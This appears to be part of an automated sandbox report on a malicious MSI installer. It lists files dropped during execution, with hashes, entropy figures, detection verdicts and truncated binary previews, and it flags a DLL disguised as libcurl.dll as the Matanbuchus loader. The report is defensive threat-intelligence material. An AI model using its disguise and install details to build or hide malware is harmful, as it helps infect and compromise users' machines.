Size (bytes):	1359
Entropy (8bit):	5.73586339433295
Encrypted:	false
SSDEEP:	24:/Og4Bt2UTXNT6TYggmbtMpUvfUFPe9lW0DhiSVzDfvQsDpD6:G1TQ0KstPID8SVf3lD6
MD5:	F4B0F32CB0177AD55AFCE97F851719C0
SHA1:	163D7264D67EE886B2F70848BFD6033B642CB654
SHA-256:	F3C03FC3B6545E13352705524319EA88AEB989E7F781CFFC73BF6407163E0117
SHA-512:	E5BC9F162198E597E8C83D2E0D8F09EA79ACEE2E944966F08955C3B77454CC68E078D96E1B55A052F175764F0AED1451B5C075E406C4DAC3FBF4DA3C064DF9A2
Malicious:	false
Preview:	...@IXOS.@.....@b..Y.@.....@.....@.....@.....@.....@......&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}..ProSoftware..klog.php.msi.@.....@.....@.....@........&.{3E648317-E941-449A-AF72-39AC6882CB87}.....@.....@.....@.....@.......@.....@.....@.......@......ProSoftware......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@......&.{08BCD781-A01D-4960-A91D-D4E69633EB46}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@........CreateFolders..Creating folders..Folder: [1]#.7.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..&.C:\Users\user\AppData\Roaming\silver\....1.C:\Users\user\AppData\Roaming\silver\libcurl.dll....WriteRegistryValues..Writing system regist

C:\Users\user\8f08\701188\701188.winmd

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	319488
Entropy (8bit):	6.566831510478186
Encrypted:	false
SSDEEP:	6144:l36YH14eJJkVRujDjVBBUUE5xN8PzTtSIgqbzJX3+uFrn:V6YVvJDj/VBU3N8uqRX3Brn
MD5:	AD47745AB2AEB60334491BA213BDCF73
SHA1:	8D8320BF0CC069F107D1EE3245D7F8BDFF7D3101
SHA-256:	394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
SHA-512:	9FD19931F2365D64B8D7CBC4BBEF7544F031C6515FAB728D1E11020CAC6070051E186CEB7E52429DEF6F559E58DB099D00D46B3BAE9BCA34AA0226B9160FE1C8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\8f08\701188\701188.winmd, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: Doc_21-04-53.js, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6=..Xn..Xn..Xn..[o..Xn..]oL.Xn..\o..Xn.Y]o..Xn.Y\o..Xn.Y[o..Xn..Yo..Xn..Yn..Xn.Y]o..Xn.YXo..Xn.YZo..XnRich..Xn........PE..L...%.Rg.........."!...&......L.....{.........................................O.....$A....@.........................@...........x.....O.h.....................O.PK......................................@............................................text...`........................... ..`.rdata..............................@..@.data...\.J.........................@....reloc..PK....O..L..................@..B.rsrc...h.....O.....................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\silver\libcurl.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	319488
Entropy (8bit):	6.566831510478186
Encrypted:	false
SSDEEP:	6144:l36YH14eJJkVRujDjVBBUUE5xN8PzTtSIgqbzJX3+uFrn:V6YVvJDj/VBU3N8uqRX3Brn
MD5:	AD47745AB2AEB60334491BA213BDCF73
SHA1:	8D8320BF0CC069F107D1EE3245D7F8BDFF7D3101
SHA-256:	394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
SHA-512:	9FD19931F2365D64B8D7CBC4BBEF7544F031C6515FAB728D1E11020CAC6070051E186CEB7E52429DEF6F559E58DB099D00D46B3BAE9BCA34AA0226B9160FE1C8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\AppData\Roaming\silver\libcurl.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: Doc_21-04-53.js, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6=..Xn..Xn..Xn..[o..Xn..]oL.Xn..\o..Xn.Y]o..Xn.Y\o..Xn.Y[o..Xn..Yo..Xn..Yn..Xn.Y]o..Xn.YXo..Xn.YZo..XnRich..Xn........PE..L...%.Rg.........."!...&......L.....{.........................................O.....$A....@.........................@...........x.....O.h.....................O.PK......................................@............................................text...`........................... ..`.rdata..............................@..@.data...\.J.........................@....reloc..PK....O..L..................@..B.rsrc...h.....O.....................@..@................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\58ee4b.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E648317-E941-449A-AF72-39AC6882CB87}, Number of Words: 10, Subject: ProSoftware, Author: Blueray INC, Name of Creating Application: ProSoftware, Template: ;1033, Comments: Set database, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	978944
Entropy (8bit):	6.982712024960584
Encrypted:	false
SSDEEP:	12288:xtu6QnN5MN+Y9x0ECIgYOx5fnL/tYi8OBZr7AicRXrdq3u8bJk:xtuxnNTY9x0ECIgYmfLVYeBZr7AM
MD5:	18D5F1A9BFB3E34FF25BBDA3F05D386F
SHA1:	4B4394E1C8D91B4D7D1BEC0C4A443FA08243994F
SHA-256:	55A33165FBA0F7134E4CA482E0951C143B04E6A0E78FDC5F702E74E08BFD9249
SHA-512:	050747B91C89396A945E3A7E4BBE10F16CE2627D531DB087DDEF86817FBD9FD1C4E067D3CBB522380D2B1A5F50696797064A19E78DD5A8ABC5A35C03DBE843FE
Malicious:	false
Preview:	......................>.......................................................D.......`......................................./...0.......................................................................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...........F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSIEF45.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Doc_21-04-53.js, Detection: malicious, Browse Filename: fes.msi, Detection: malicious, Browse Filename: zdi.txt.msi, Detection: malicious, Browse Filename: merd.msi, Detection: malicious, Browse Filename: medk.msi, Detection: malicious, Browse Filename: lavi.msi, Detection: malicious, Browse Filename: Document-v09-42-38.js, Detection: malicious, Browse Filename: Document-v05-53-20.js, Detection: malicious, Browse Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse Filename: Document-19-06-38.js, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIEFA4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIEFD4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIF014.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIF072.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1730
Entropy (8bit):	5.5716789232408885
Encrypted:	false
SSDEEP:	24:/Tg4Bt2UTXNhu6SHfbopWzlzbastcZpUWfUFP37rPJG9QP9TcqvSDhiS/zAfgxps:r1TBNspz6mP3PUOQD8S/XDI
MD5:	8FBA988EABA2077258EF38D0D4F37F21
SHA1:	F96FF08107BDA5643FCF124235DA030C8B282040
SHA-256:	F76168DFAD2858F1A44D27D1616BF5BAA35771DDB54AC0560960147B77B7E8D0
SHA-512:	CD9138122B29C2D713F55D2C389AAB6DBAD9A56BCA6A2F98DD013E0DC2D99EAD84D58547EB88700845BAA9D54CD70CE0AFEFD7DAAEDF17DA0013E0EC7595CD9B
Malicious:	false
Preview:	...@IXOS.@.....@b..Y.@.....@.....@.....@.....@.....@......&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}..ProSoftware..klog.php.msi.@.....@.....@.....@........&.{3E648317-E941-449A-AF72-39AC6882CB87}.....@.....@.....@.....@.......@.....@.....@.......@......ProSoftware......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}7.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB},.01:\Software\Blueray INC\ProSoftware\Version.@.......@.....@.....@......&.{08BCD781-A01D-4960-A91D-D4E69633EB46}1.C:\Users\user\AppData\Roaming\silver\libcurl.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".7.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@...

C:\Windows\Installer\SourceHash{77E11148-E1F4-45C0-AAA9-BBA409C05474}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1631308035168582
Encrypted:	false
SSDEEP:	12:JSbX72FjGGSQAGiLIlHVRpfh/7777777777777777777777777vDHF1KB3qutpwz:JjSQQI5bjKF
MD5:	E951206D675E97D079E41FDD44EEC3D0
SHA1:	180452661ABEDC2F8BDEA8222CF616791E954FB7
SHA-256:	B03DF701A9265BF7F93F43CF014ADF9C6ADA2644610CEAB4999C276172929F11
SHA-512:	A91C1B11F49BBDFDF20DF44C57B7A92E896DEA7D4C8B29CB18E878DCB474E65B3239A0C1A66D5632B68961938453907614475C382FBDAC17F5580AFBFB260DB8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5366503842416086
Encrypted:	false
SSDEEP:	48:iz8Ph8uRc06WXJ4FT5nTAHOfDSCHOfdAECiCyoqoXHOfDSCHOfBTlQ:iah81bFTt6yHvECLyH
MD5:	8B9968903397BBF26143C24EECEA5260
SHA1:	9D5098AC0E05EF020B81967137844875C29DAD92
SHA-256:	517F108EBE10CAD1DF1823823048DA0A8B40F05EE6661F0718CAAE403A54D74C
SHA-512:	C458E88C546A973FAC22843BFA4C08FF8E737D1E46209C41EB209790F314E6D9F38AA38D8E3B7D0CE22A831673B9EBBB3C283AE82A04E12103AB2D2A881443F8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.375177615576425
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau4:zTtbmkExhMJCIpErl
MD5:	6758FAA86A76821FB9119FB8FA250CDB
SHA1:	6222AEFB442DED6AA3004DCB780EB0D5768FD089
SHA-256:	34559277C936493DFC1BEFEF7E33005A5AA115B133BE0E4938878FB3966043A7
SHA-512:	0048E40B3D82D8A1A7C47956790FB85052AB13D52EF4FB7F8B69AEA8C2D41ECDF1335D32D5F33264659D8FE95D41BD36A7E20C0868F389F7793B38D4498216D2
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF05E81200B5245520.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF10EE077A8D1DA6C9.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF31F7292E5E50E117.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.12738936730442846
Encrypted:	false
SSDEEP:	48:fQgTeHOfDSCHOf6HOfDSCHOfdAECiCyoqocR:GyHbyHvECg
MD5:	01D8E242D1418C9400078CB1CB2F5981
SHA1:	19FEFB03A8CCC2F1A5DCABC09BC77860C0B4B944
SHA-256:	C276DDA1C1B826005F6FC022B4AB19B5707E9D74A028A58605129754B972F645
SHA-512:	42CBCB0F9F35219EBCE6191C2786190E26E47F2F6ED9F424F438B3C1E3DB4DE84CE9A86DB0816CA4AA9F7B9F13EAE02756BA8BE8CBF91223550D77F0C85B9C45
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF52408E970151573B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5366503842416086
Encrypted:	false
SSDEEP:	48:iz8Ph8uRc06WXJ4FT5nTAHOfDSCHOfdAECiCyoqoXHOfDSCHOfBTlQ:iah81bFTt6yHvECLyH
MD5:	8B9968903397BBF26143C24EECEA5260
SHA1:	9D5098AC0E05EF020B81967137844875C29DAD92
SHA-256:	517F108EBE10CAD1DF1823823048DA0A8B40F05EE6661F0718CAAE403A54D74C
SHA-512:	C458E88C546A973FAC22843BFA4C08FF8E737D1E46209C41EB209790F314E6D9F38AA38D8E3B7D0CE22A831673B9EBBB3C283AE82A04E12103AB2D2A881443F8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF529C25150BFF8FC2.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.234051024858325
Encrypted:	false
SSDEEP:	48:TTx0uBO+CFXJ9T5fTAHOfDSCHOfdAECiCyoqoXHOfDSCHOfBTlQ:T90dVTF6yHvECLyH
MD5:	6942B083D895242AA780C9D8ACE57132
SHA1:	7F952BC70AABBAE4BC38A73F79F883761F04ED8B
SHA-256:	9DE7A4537AB8E3E7BB40A343977D435BA9FA278139A95193FE5C69C0CBA3686C
SHA-512:	D0784E4247A2779F5B6A13DACFD82F1E583FFBFEA0CA2B5BE020C8FED5605C35F3D5FFD62B157EAEB45D207DB4BD9260A2DEB40E7824F7F7ECF344ECAD6CB9BC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF81C70186B64922D4.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07060551616597908
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOoohXsvzdBri0mzI4Vky6lw:2F0i8n0itFzDHF1KB3Tw
MD5:	CAB26B43A074D0392CA48ED059FBB74C
SHA1:	758A19ECE35F152BC91D567D7BD7F3EEA3B39DE6
SHA-256:	01FAE5A810D1B187464A96E01714BC1C8E3D20F0D938928B074A180225899C8B
SHA-512:	4DE09BE99D93BC3A33BE0A92E89DC78C1E96921A24A84BD6D7C7BAB7E64AE815E98A3685A9A7695AC3C49A7066E2D889C380A0E4D2AFA6844BFDE8802BE62251
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8E0346B90619559B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9AE33704988A4A25.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5366503842416086
Encrypted:	false
SSDEEP:	48:iz8Ph8uRc06WXJ4FT5nTAHOfDSCHOfdAECiCyoqoXHOfDSCHOfBTlQ:iah81bFTt6yHvECLyH
MD5:	8B9968903397BBF26143C24EECEA5260
SHA1:	9D5098AC0E05EF020B81967137844875C29DAD92
SHA-256:	517F108EBE10CAD1DF1823823048DA0A8B40F05EE6661F0718CAAE403A54D74C
SHA-512:	C458E88C546A973FAC22843BFA4C08FF8E737D1E46209C41EB209790F314E6D9F38AA38D8E3B7D0CE22A831673B9EBBB3C283AE82A04E12103AB2D2A881443F8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA4B2117BE85DAE25.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB5926957CC45A5BF.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBB5D89CA30C47638.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.234051024858325
Encrypted:	false
SSDEEP:	48:TTx0uBO+CFXJ9T5fTAHOfDSCHOfdAECiCyoqoXHOfDSCHOfBTlQ:T90dVTF6yHvECLyH
MD5:	6942B083D895242AA780C9D8ACE57132
SHA1:	7F952BC70AABBAE4BC38A73F79F883761F04ED8B
SHA-256:	9DE7A4537AB8E3E7BB40A343977D435BA9FA278139A95193FE5C69C0CBA3686C
SHA-512:	D0784E4247A2779F5B6A13DACFD82F1E583FFBFEA0CA2B5BE020C8FED5605C35F3D5FFD62B157EAEB45D207DB4BD9260A2DEB40E7824F7F7ECF344ECAD6CB9BC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE08CAA807DFE31DC.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.234051024858325
Encrypted:	false
SSDEEP:	48:TTx0uBO+CFXJ9T5fTAHOfDSCHOfdAECiCyoqoXHOfDSCHOfBTlQ:T90dVTF6yHvECLyH
MD5:	6942B083D895242AA780C9D8ACE57132
SHA1:	7F952BC70AABBAE4BC38A73F79F883761F04ED8B
SHA-256:	9DE7A4537AB8E3E7BB40A343977D435BA9FA278139A95193FE5C69C0CBA3686C
SHA-512:	D0784E4247A2779F5B6A13DACFD82F1E583FFBFEA0CA2B5BE020C8FED5605C35F3D5FFD62B157EAEB45D207DB4BD9260A2DEB40E7824F7F7ECF344ECAD6CB9BC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

